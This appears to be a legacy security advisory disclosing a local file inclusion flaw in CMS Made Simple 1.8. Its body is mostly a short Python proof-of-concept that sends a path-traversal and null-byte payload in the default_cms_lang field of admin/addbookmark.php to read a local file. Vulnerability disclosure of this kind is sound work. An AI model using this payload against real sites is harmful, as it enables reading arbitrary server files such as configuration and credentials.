Home
Consulting
Advisories
Software
Articles
Contact

CMS Made Simple 1.8 Local File Inclusion

Legacy Advisories

Description

A local file inclusion vulnerability in CMS Made Simple 1.8 can be exploited to include arbitrary files.

Proof Of Concept

import httplib, urllib

host = 'localhost'
path = '/cmsms'

lfi = '../' * 32 + 'windows/win.ini\x00'

c = httplib.HTTPConnection(host)
c.request('POST', path + '/admin/addbookmark.php',
          urllib.urlencode({ 'default_cms_lang': lfi }),
          { 'Content-type': 'application/x-www-form-urlencoded' })
r = c.getresponse()

print r.status, r.reason
print r.read()


Copyright © 2018 AutoSec Tools LLC